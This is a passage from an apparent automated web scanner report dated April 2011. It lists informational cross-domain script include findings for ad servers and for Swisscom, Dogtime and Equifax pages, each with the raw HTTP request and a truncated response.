document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5236856.2;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=904952%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=16%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=16%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.121. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.6042884822964301 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFad=3:6:5:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:1,1,1:1,1,1:0,1,1:2,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|2,1,1:1,1,1:1,1,1:0,1,1:2,1,1;expires=Tue, 24 May 2011 16:46:33 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:3:6:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=228
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:33 GMT
Connection: close
Content-Length: 2073

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=6%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=6%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.122. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7952332795167094 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=46:51:46:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=47:46:51:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=108
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:06 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=47%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=47%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.123. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.48420323876527604 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=14:12:12:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:01 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=13:14:12:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:01 GMT
Connection: close
Content-Length: 2103

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.33;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929078%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=13%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=13%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.124. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8832309295572303 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=18:16:16:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:16 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=17:18:16:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:16 GMT
Connection: close
Content-Length: 2093

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.30;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929081%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=17%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=17%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.125. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5751898586573593 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=54:65:55:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:51:05 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=56:54:65:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:05 GMT
Connection: close
Content-Length: 2106

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=56%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=56%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.126. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.32167528868912826 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=44:43:47:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=45:43:47:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=115
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:49:59 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=45%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=45%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.127. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.3152086012271308 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=23:22:21:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:3,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:36 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=22:23:22:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=106
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:48:36 GMT
Connection: close
Content-Length: 2142

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=22%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=22%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.128. http://de.swisscom.ch/privatkunden  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.swisscom.ch
Path:   /privatkunden

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privatkunden HTTP/1.1
Host: de.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Zeus
Date: Sun, 24 Apr 2011 18:49:44 GMT
Set-Cookie: l_pro=86; expires=Sun, 08-May-2011 18:49:44 GMT; path=/
Content-Type: text/html
Content-Length: 37772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="content-type" content="tex
...[SNIP]...
<link rel="stylesheet" href="http://search.bluewin.ch/css/popup/nyroModal.css" type="text/css"    media="screen" />
<script type="text/javascript" src="http://search.bluewin.ch/js/osn/jquery.cookie.js"></script>
<script type="text/javascript" src="http://search.bluewin.ch/js/osn/jquery.base64.js"></script>
<script type="text/javascript" src="http://search.bluewin.ch/js/popup/jquery.nyroModal-1.6.2.js"></script>
<script type="text/javascript" src="http://search.bluewin.ch/js/popup/jquery.ba-postmessage.min.js"></script>
<script type="text/javascript" src="http://search.bluewin.ch/js/popup/search.popup.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="//www.swisscom.ch/FxRes/asp/sitecatalyst/s_code_bw.js"></script>
<script language="JavaScript" type="text/javascript" src="http://sc.swisscom.ch/js/osn/s_one_code.js"></script>
...[SNIP]...

24.129. http://dogtime.com/ads/dtm/tp_support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dogtime.com
Path:   /ads/dtm/tp_support.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ads/dtm/tp_support.html HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: dogtime.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 24 Apr 2011 16:45:58 GMT
Content-Type: text/html
Last-Modified: Thu, 21 Apr 2011 18:38:35 GMT
Connection: keep-alive
Content-Length: 680

<html>
<head><title>DTM TP</title></head>
<body>
<!-- Advertiser 'Online Media Diva', Include user in segment 'OMD_Retarget' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldman
...[SNIP]...
<!-- Segment Pixel - DogTime Media Retargeting Include - DO NOT MODIFY -->
<script src="http://ads.exactdrive.com/seg?add=38372&t=1" type="text/javascript"></script>
...[SNIP]...

24.130. http://en.swisscom.ch/residential  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.swisscom.ch
Path:   /residential

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /residential HTTP/1.1
Host: en.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vnum=1306263001740%26vn%3D1; s_one_campaign=level0%3Anone; CTQ=http%3A//de.swisscom.ch/privatkunden; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_nr=1303671059690-New; undefined_s=First%20Visit; s_invisit=true; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/de/privatkunden/61%2526pidt%253D1%2526oid%253Dhttp%25253A//www.swisscom.ch/residential%2526ot%253DA%26swisscompublic%3D%2526pid%253D/de/privatkunden/61%2526pidt%253D1%2526oid%253Dhttp%25253A//www.swisscom.ch/residential%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Zeus
Date: Sun, 24 Apr 2011 18:50:50 GMT
Set-Cookie: l_pro=86; expires=Sun, 08-May-2011 18:50:50 GMT; path=/
Content-Type: text/html
Content-Length: 37285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="content-type" content="tex
...[SNIP]...
<link rel="StyleSheet" type="text/css" href="http://de.swisscom.ch/css/minified.css">
<script type="text/javascript" src="http://de.swisscom.ch/js/minified_2009-08-26.js"></script>
<script type="text/javascript" src="http://de.swisscom.ch/js/swfobject.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://de.swisscom.ch/css/webcode.css" type="text/css" />
<script src="http://de.swisscom.ch/js/osn/jquery.min.js" type="text/javascript"></script>
<script src="http://de.swisscom.ch/js/osn/osn_header.js" type="text/javascript"></script>
<link rel="stylesheet" href="http://search.bluewin.ch/css/popup/nyroModal.css" type="text/css"    media="screen" />
<script type="text/javascript" src="http://search.bluewin.ch/js/osn/jquery.cookie.js"></script>
<script type="text/javascript" src="http://search.bluewin.ch/js/osn/jquery.base64.js"></script>
<script type="text/javascript" src="http://search.bluewin.ch/js/popup/jquery.nyroModal-1.6.2.js"></script>
<script type="text/javascript" src="http://search.bluewin.ch/js/popup/jquery.ba-postmessage.min.js"></script>
<script type="text/javascript" src="http://search.bluewin.ch/js/popup/search.popup.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="//www.swisscom.ch/FxRes/asp/sitecatalyst/s_code_bw.js"></script>
<script language="JavaScript" type="text/javascript" src="http://sc.swisscom.ch/js/osn/s_one_code.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://de.swisscom.ch/js/xajax_multi.js"></script>
...[SNIP]...

24.131. http://equifax.com/free30daytrial/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equifax.com
Path:   /free30daytrial/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA HTTP/1.1
Host: equifax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hbx.hc2=CJ; hbx.hc3=null; hbx.timestamp=1303614816593

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:53:06 GMT
Content-length: 13111
Content-type: text/html
Last-modified: Wed, 30 Mar 2011 22:21:05 GMT
Etag: "3337-4d93acd1"
Accept-ranges: bytes

<!DOCTYPE html>

<html lang="en">
<head>
<!-- META -->
<meta charset="utf-8">
<meta name="author" content="Equifax" />
